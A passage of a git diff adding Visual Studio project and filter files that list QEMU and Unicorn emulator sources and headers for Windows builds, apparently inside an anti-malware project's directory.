Include="..\..\..\qemu\include\exec\helper-tcg.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\hwaddr.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\ioport.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\memory-internal.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\memory.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\poison.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\ram_addr.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\softmmu-semi.h" /> + <ClInclude Include="..\..\..\qemu\include\exec\spinlock.h" /> + <ClInclude Include="..\..\..\qemu\include\fpu\softfloat.h" /> + <ClInclude Include="..\..\..\qemu\include\glib_compat.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\arm\arm.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\boards.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\cpu\icc_bus.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\hw.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic_internal.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\i386\pc.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\irq.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\m68k.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\mcf.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\bios.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\cpudevs.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\mips\mips.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\qdev-core.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\qdev.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\grlib.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc32_dma.h" /> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sun4m.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\dealloc-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\error.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\opts-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-input-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-output-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qbool.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qdict.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qerror.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qfloat.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qint.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qjson.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qlist.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qobject.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qstring.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\types.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\string-input-visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor-impl.h" /> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu-common.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\aes.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\atomic.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bitmap.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bitops.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\bswap.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\compiler.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\crc32c.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\host-utils.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\int128.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\log.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\module.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\notify.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\osdep.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\queue.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\range.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-posix.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-win32.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\thread.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\timer.h" /> + <ClInclude Include="..\..\..\qemu\include\qemu\typedefs.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\cpu.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\object.h" /> + <ClInclude Include="..\..\..\qemu\include\qom\qom-qobject.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\accel.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\cpus.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\memory_mapping.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\os-win32.h" /> + <ClInclude Include="..\..\..\qemu\include\sysemu\sysemu.h" /> + <ClInclude Include="..\..\..\qemu\vl.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="..\qapi-types.h" /> + <ClInclude Include="..\qapi-visit.h" /> + </ItemGroup> + <ItemGroup> + <MASM Include="..\..\..\qemu\util\setjmp-wrapper-win32.asm"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</ExcludedFromBuild> + </MASM> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" /> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj.filters new file mode 100644 index 0000000..da3121f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn/unicorn.vcxproj.filters @@ -0,0 +1,505 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="dllmain.cpp" /> + <ClCompile Include="..\..\..\list.c"> + <Filter>priv</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\accel.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\glib_compat.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qemu-log.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qemu-timer.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg-runtime.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\vl.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\aes.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\bitmap.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\bitops.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\crc32c.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\cutils.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\error.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\getauxval.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\host-utils.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\module.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\oslib-win32.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-error.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-thread-win32.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\util\qemu-timer-common.c"> + <Filter>qemu\util</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\core\machine.c"> + <Filter>qemu\hw\core</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\core\qdev.c"> + <Filter>qemu\hw\core</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qapi-dealloc-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qapi-visit-core.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qmp-input-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\qmp-output-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qapi\string-input-visitor.c"> + <Filter>qemu\qapi</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qbool.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qdict.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qerror.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qfloat.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qint.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qlist.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qobject\qstring.c"> + <Filter>qemu\qobject</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\container.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\cpu.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\object.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\qom\qom-qobject.c"> + <Filter>qemu\qom</Filter> + </ClCompile> + <ClCompile Include="..\..\..\uc.c" /> + <ClCompile Include="..\qapi-types.c"> + <Filter>qemu</Filter> + </ClCompile> + <ClCompile Include="..\qapi-visit.c"> + <Filter>qemu</Filter> + </ClCompile> + </ItemGroup> + <ItemGroup> + <Filter Include="priv"> + <UniqueIdentifier>{1d58ccd1-7ea5-40e0-ba38-304ac34bf08e}</UniqueIdentifier> + </Filter> + <Filter Include="qemu"> + <UniqueIdentifier>{438f79b0-21e5-4a21-8e61-271b88a3130d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\util"> + <UniqueIdentifier>{88e75519-13ca-431e-8b6d-d915d5e12231}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\hw"> + <UniqueIdentifier>{669d34d7-8f38-47ac-ac1b-1f485bc9d6eb}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\hw\core"> + <UniqueIdentifier>{2182308b-b1c8-4ac4-a779-c9d86c3cf97d}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qapi"> + <UniqueIdentifier>{70273f5a-23c0-4274-acc8-0c398ec327e7}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qobject"> + <UniqueIdentifier>{b84e89c5-c18f-4505-a2b9-b6cacbf97d1a}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\qom"> + <UniqueIdentifier>{c0e7454f-a22a-4410-87e9-bd8668a2fc5b}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include"> + <UniqueIdentifier>{0d15a173-37a6-4507-a128-de4316618e68}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\exec"> + <UniqueIdentifier>{fcbdd971-b481-4edc-a96a-3cdaeeadf2e9}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\fpu"> + <UniqueIdentifier>{01269629-99a8-41ee-9595-b1c745b1a044}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw"> + <UniqueIdentifier>{e1755d99-2324-43b4-9896-2400610e0b31}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\arm"> + <UniqueIdentifier>{daf8ad72-5390-43b2-8c7b-082ce1084aed}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\cpu"> + <UniqueIdentifier>{da199412-30ad-4c72-9a5a-a7b280c00021}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\i386"> + <UniqueIdentifier>{5f01eb28-ffe0-4371-a677-32ded26a33e2}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\m68k"> + <UniqueIdentifier>{dfebfef7-1435-4d09-89f6-94fb929f3488}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\mips"> + <UniqueIdentifier>{969bee88-382e-4c05-9205-074f24bdaf82}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\hw\sparc"> + <UniqueIdentifier>{7195ce60-b300-4dbe-8072-3e812167a036}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qapi"> + <UniqueIdentifier>{0f13072a-571c-4c81-bef3-513758b38832}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qapi\qmp"> + <UniqueIdentifier>{0ae19983-bbd0-448f-a319-574d45f59dfe}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qemu"> + <UniqueIdentifier>{5653dd50-a557-4573-8f43-7ef26d0d4190}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\qom"> + <UniqueIdentifier>{36443fca-61fc-4f64-a872-2ddd3d823cb9}</UniqueIdentifier> + </Filter> + <Filter Include="qemu\include\sysemu"> + <UniqueIdentifier>{5e47a1c2-85ab-48d6-921e-8915438c2cbf}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\include\list.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\qemu.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\uc_priv.h"> + <Filter>priv</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\vl.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\config-host.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\qapi-types.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\qapi-visit.h"> + <Filter>qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\config.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\elf.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\glib_compat.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu-common.h"> + <Filter>qemu\include</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\address-spaces.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-all.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-common.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu-defs.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cputlb.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\cpu_ldst_template.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\exec-all.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\gen-icount.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-gen.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-head.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-proto.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\helper-tcg.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\hwaddr.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\ioport.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\memory-internal.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\memory.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\poison.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\ram_addr.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\softmmu-semi.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\exec\spinlock.h"> + <Filter>qemu\include\exec</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\fpu\softfloat.h"> + <Filter>qemu\include\fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\boards.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\hw.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\irq.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\qdev-core.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\qdev.h"> + <Filter>qemu\include\hw</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\arm\arm.h"> + <Filter>qemu\include\hw\arm</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\cpu\icc_bus.h"> + <Filter>qemu\include\hw\cpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\apic_internal.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\i386\pc.h"> + <Filter>qemu\include\hw\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\m68k.h"> + <Filter>qemu\include\hw\m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\m68k\mcf.h"> + <Filter>qemu\include\hw\m68k</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\bios.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\cpudevs.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\mips\mips.h"> + <Filter>qemu\include\hw\mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\grlib.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sparc32_dma.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\hw\sparc\sun4m.h"> + <Filter>qemu\include\hw\sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\dealloc-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\error.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\opts-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-input-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp-output-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\string-input-visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor-impl.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\visitor.h"> + <Filter>qemu\include\qapi</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qbool.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qdict.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qerror.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qfloat.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qint.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qjson.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qlist.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qobject.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\qstring.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qapi\qmp\types.h"> + <Filter>qemu\include\qapi\qmp</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\aes.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\atomic.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bitmap.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bitops.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\bswap.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\compiler.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\crc32c.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\host-utils.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\int128.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\log.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\module.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\notify.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\osdep.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\queue.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\range.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-posix.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread-win32.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\thread.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\timer.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qemu\typedefs.h"> + <Filter>qemu\include\qemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\cpu.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\object.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\qom\qom-qobject.h"> + <Filter>qemu\include\qom</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\accel.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\cpus.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\memory_mapping.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\os-win32.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\include\sysemu\sysemu.h"> + <Filter>qemu\include\sysemu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\include\unicorn\arm.h" /> + <ClInclude Include="..\..\..\include\unicorn\arm64.h" /> + <ClInclude Include="..\..\..\include\unicorn\m68k.h" /> + <ClInclude Include="..\..\..\include\unicorn\mips.h" /> + <ClInclude Include="..\..\..\include\unicorn\platform.h" /> + <ClInclude Include="..\..\..\include\unicorn\sparc.h" /> + <ClInclude Include="..\..\..\include\unicorn\unicorn.h" /> + <ClInclude Include="..\..\..\include\unicorn\x86.h" /> + </ItemGroup> + <ItemGroup> + <MASM Include="..\..\..\qemu\util\setjmp-wrapper-win32.asm" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj new file mode 100644 index 0000000..f4e6cb6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/unicorn_static/unicorn_static.vcxproj @@ -0,0 +1,378 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\list.c" /> + <ClCompile Include="..\..\..\qemu\accel.c" /> + <ClCompile Include="..\..\..\qemu\glib_compat.c" /> + <ClCompile Include="..\..\..\qemu\hw\core\machine.c" /> + <ClCompile Include="..\..\..\qemu\hw\core\qdev.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qapi-dealloc-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qapi-visit-core.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qmp-input-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\qmp-output-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qapi\string-input-visitor.c" /> + <ClCompile Include="..\..\..\qemu\qemu-log.c" /> + <ClCompile Include="..\..\..\qemu\qemu-timer.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qbool.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qdict.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qerror.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qfloat.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qint.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qlist.c" /> + <ClCompile Include="..\..\..\qemu\qobject\qstring.c" /> + 